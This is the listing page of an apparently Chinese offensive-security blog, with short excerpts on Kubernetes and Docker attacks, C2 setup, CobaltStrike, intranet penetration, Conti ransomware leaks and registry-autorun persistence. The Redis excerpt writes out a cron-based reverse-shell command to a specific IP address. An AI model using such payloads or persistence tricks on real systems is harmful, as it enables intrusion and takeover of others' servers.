Logo

菜单

作者:Administrator

CloudNative

云原生安全攻防指南

前言 文章主要根据kubernetes的威胁矩阵来进行书写,但是也会参考其他的资料。本文会结合之前在本地搭建的k8s集群进行讲解,具体搭建的文章可以参考前文。文章主要着笔点在初始访问,其他的如持久化,权限提升,凭据获取等可能会一笔带过或者只是提供一个标题供参考,因为写起来实在是又臭又长而且又和之前的

Administrator Administrator 发布于 2024-12-22
Post-Exploit #post-exploit

Redis unauthorized post exploit

cron set 4a "\n\n*/1 * * * * bash -i >& /dev/tcp/120.79.51.115/91 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save webshell #

Administrator Administrator 发布于 2024-12-06
Cloud Hacking-(1)
CloudNative

Cloud Hacking-(1)

Docker Hacking Exposed Docker API When you install dcoker on a system it will expose an API on your local host located on port 2375.This API can be us

Administrator Administrator 发布于 2024-12-01
汇编语言 #汇编

使用汇编语言实现xor加密

.386 .model flat, stdcall .stack 4096 ExitProcess PROTO, dwExitCode:DWORD INCLUDE Irvine32.inc KEY = 239 BUFMAX = 128 .data sPrompt BYTE "Enter

Administrator Administrator 发布于 2024-11-27

Kubernetes 环境安全与权限检查

检查节点信息与污点配置 使用 kubectl describe nodes 命令可以详细查看节点的配置信息,包括其污点(Taints),这些污点可能影响 Pod 的调度: kubectl --server=https://10.80.0.1:443 --insecure-skip-tls-verif

Administrator Administrator 发布于 2024-11-26
Mythic C2搭建(apollo&&sliver)
C2 #Mythic

Mythic C2搭建(apollo&&sliver)

项目地址 Mythic :https://github.com/its-a-feature/Mythic Agents:https://github.com/MythicAgents/ Profiles:https://github.com/MythicC2Profiles Document:htt

Administrator Administrator 发布于 2024-11-25
内网渗透 #ActiveDirectory#CobaltStrike

CobaltStrike攻击手册

权限提升和信息收集 初步侦查 1.1搜索公司收入 找到公司网站 在Google上搜索:公司名称 + 收入 (mycorporation.com + revenue) (“mycorporation.com” “revenue”) 检查超过1个网站,如果可能的话 (owler, manta, zoom

Administrator Administrator 发布于 2024-11-11
内网渗透 #内网渗透#信息收集#痕迹清理#权限提升#横向移动 #隧道搭建

内网渗透基础

前言 本文主要对一些有用常用的但不太基础的内容作以记录 信息收集 Chrome浏览器信息 历史记录 %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History 微信文件 枚举微信账户接受的文件 dir /s /b C:\Us

Administrator Administrator 发布于 2024-11-11
威胁情报 #勒索组织#RAAS#内网渗透

通过Conti勒索组织泄露的文件我们可以学到什么?

网站创建批处理脚本 http://tobbot.com/data/ 非常适合创建命令,然后生成批处理文件 使用Tor网络进行工作 接下来(对于那些还没有这样做的人),我建议将整个工作站转移到通过Tor网络工作。 为此,您需要配置您的操作系统和Whonix(这是一个为您创建“安全的Tor隧道”的操作系

Administrator Administrator 发布于 2024-11-04

使用C语言添加程序到注册表自启动项

核心函数 #include "AutoRun.h" BOOL Reg_CurrentUser(LPCWSTR lpszFileName, LPCWSTR lpszValueName) { HKEY hKey; printf("[+] length: %d\n",::lstrlen(lpszFi

Administrator Administrator 发布于 2024-11-02
上一页 1 / 2 下一页